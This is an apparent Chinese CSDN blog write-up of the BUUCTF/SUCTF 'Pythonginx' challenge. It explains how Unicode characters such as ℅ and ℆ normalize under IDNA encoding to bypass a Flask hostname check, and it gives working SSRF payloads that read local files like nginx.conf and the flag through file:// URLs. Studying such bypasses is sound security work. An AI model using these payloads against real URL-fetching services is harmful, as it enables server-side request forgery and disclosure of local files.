url中的unicode漏洞

最新推荐文章于 2024-04-08 09:45:00 发布

ring4ring

最新推荐文章于 2024-04-08 09:45:00 发布

阅读量444

点赞数

分类专栏： ctf 文章标签： url中的unicode漏洞 Host/Split: Exploitable Antipattern pythonnginx buuctf

本文链接：https://blog.csdn.net/weixin_44897902/article/details/103451096

版权

ctf 专栏收录该内容

22 篇文章 0 订阅

订阅专栏

上周帮室友考python，才知道自己python学得有多垃圾
神仙打架之—>nginx

预期解：Host/Split: Exploitable Antipatterns in Unicode Normalization（详情请戳这儿）
源码和分析如下：

@app.route('/getUrl', methods=['GET', 'POST'])
def getUrl():
    url = request.args.get("url")#get方式请求
    host = parse.urlparse(url).hostname#解析域名，result=parse.urlparse(url),则result[0]=http/https result[1]=主机和端口 result[2]=资源路径 result[3]=参数 这里的.hostname为主机

    if host == 'suctf.cc':#解析第一次，主机名不能是suctf.cc
        return "我扌 your problem? 111"
    parts = list(urlsplit(url))#拆分成：SplitResult(   scheme='https', netloc='www.baidu.com:80',  path='/index.html;parameters', query='name=tom',    fragment='example')
    host = parts[1]#主机名
    if host == 'suctf.cc':#第二次解析也不能是suctf.cc
        return "我扌 your problem? 222 " + host
    newhost = []
    for h in host.split('.'):#按点分开,
        newhost.append(h.encode('idna').decode('utf-8'))#encode('idna')编码方式，decode('utf-8')是将utf-8转换为unicode
    parts[1] = '.'.join(newhost)#转换成字符串
    #去掉 url 中的空格
    finalUrl = urlunsplit(parts).split(' ')[0]
    host = parse.urlparse(finalUrl).hostname#解析第三次
    if host == 'suctf.cc':
        return urllib.request.urlopen(finalUrl, timeout=2).read()#ssrf，服务器端请求伪造
    else:
        return "我扌 your problem? 333"

if __name__ == "__main__":
    app.run(host='0.0.0.0', port=80)

一共经过三次解析，要求前两次解析的主机名不能又suctf.cc，而第三次要有，就能进行ssrf
而解题的关键是在url对含有unicode的解析上
经

https://tiaonmmn.github.io/2019/09/03/BUUOJ%E5%88%B7%E9%A2%98-Web-Pythonginx/

这位师傅的解释：
URL包含Unicode字符时会转成Punycode(Punycode是一种表示Unicode码和ASCII码的有限的字符集)，转换的时候会对Unicode字符额外编码(IDNA,特殊字符域名,详情参考：这儿)，但有的Unicode字符转IDNA的时候已经解释成正常ASCII字符了，Punycode就不会进行。/就是转IDNA时已经解释成正常ASCII字符的一种字符，而/刚好会影响网址。如”℀”，转换的时候就变成了a/c，造成URL的切割。www.f℀ke.microsoft.com，就会变成www.fa/cke.microsoft.com，域名发生变化。
而拥有/字符的unicode有以下这些：

而我们只要构造suctf.c℅，在前两次解析时，都不会出现与suctf.cc相等的情况，因为还有没有进行IDNA解析
而在第二次后，第三次前，执行语句：newhost.append(h.encode('idna').decode('utf-8'))的时候，进行了idna解析，使得℅变成了c/o,则原域名变成了suctf.cc/o,从而成功绕过检验，实现ssrf
现在进行文件的读取，使用file://,为了成功读取文件，这里使用℆
所以payload:

file://suctf.c℆sr/local/nginx/conf/nginx.conf

这样真正的语句其实是：file://suctf.cc/usr/local/nginx/conf/nginx.conf，成功读取到nginx的配置文件；
这里进行补充说明，nginx的配置文件路径有：


    配置文件存放目录：/etc/nginx
    主配置文件：/etc/nginx/conf/nginx.conf
    管理脚本：/usr/lib64/systemd/system/nginx.service
    模块：/usr/lisb64/nginx/modules
    应用程序：/usr/sbin/nginx
    程序默认存放位置：/usr/share/nginx/html
    日志默认存放位置：/var/log/nginx

更多参考：

https://www.jianshu.com/p/e64539590865

页面返回：
在这里插入图片描述在进行对flag的读取即可

非预期：
大佬的关注点在于urlsplit这个函数
例如：

#url='http://www.baidu.com/s?wd=python&username=abc#1'

进行分割之后得到：
在这里插入图片描述

def urlunsplit(components):
    scheme, netloc, url, query, fragment, _coerce_result = (
                                          _coerce_args(*components))#拆分
    if netloc or (scheme and scheme in uses_netloc and url[:2] != '//'):#如果有netloc变量或者（有scheme并且scheme在uses_netloc里）,这里的url其实是path
        if url and url[:1] != '/': url = '/' + url
        url = '//' + (netloc or '') + url
    if scheme:#这里并没有对netloc做必须要有数据的要求，可以构造file:abc绕过，scheme：file,url://abc
        url = scheme + ':' + url
    if query:
        url = url + '?' + query
    if fragment:
        url = url + '#' + fragment
    return _coerce_result(url)

在这句：if scheme，并没有对netloc 做要求，因此，假如传入

file:abc

那么这个 url 传入 parse.urlparse 时，netloc（题目中的host）是为空的，而 path 为 //abc，当进入到 urlunsplit 后，netloc 为空不进入第一块代码，schema 为 file，进入第二个代码块，拼接后 url 就变成了：file://abc
所以构造payload:

file:suctf.cc/usr/fffffflag

第一次，host为空，第二次，host仍然为空，进入第三次
测试代码如下：

from urllib.parse import urlsplit,urlunsplit, unquote
from urllib import parse

url = "file:abc"
parts = parse.urlsplit(url)
print(parts)

url2 = urlunsplit(parts)
parts2 = parse.urlsplit(url2)

print(parts2)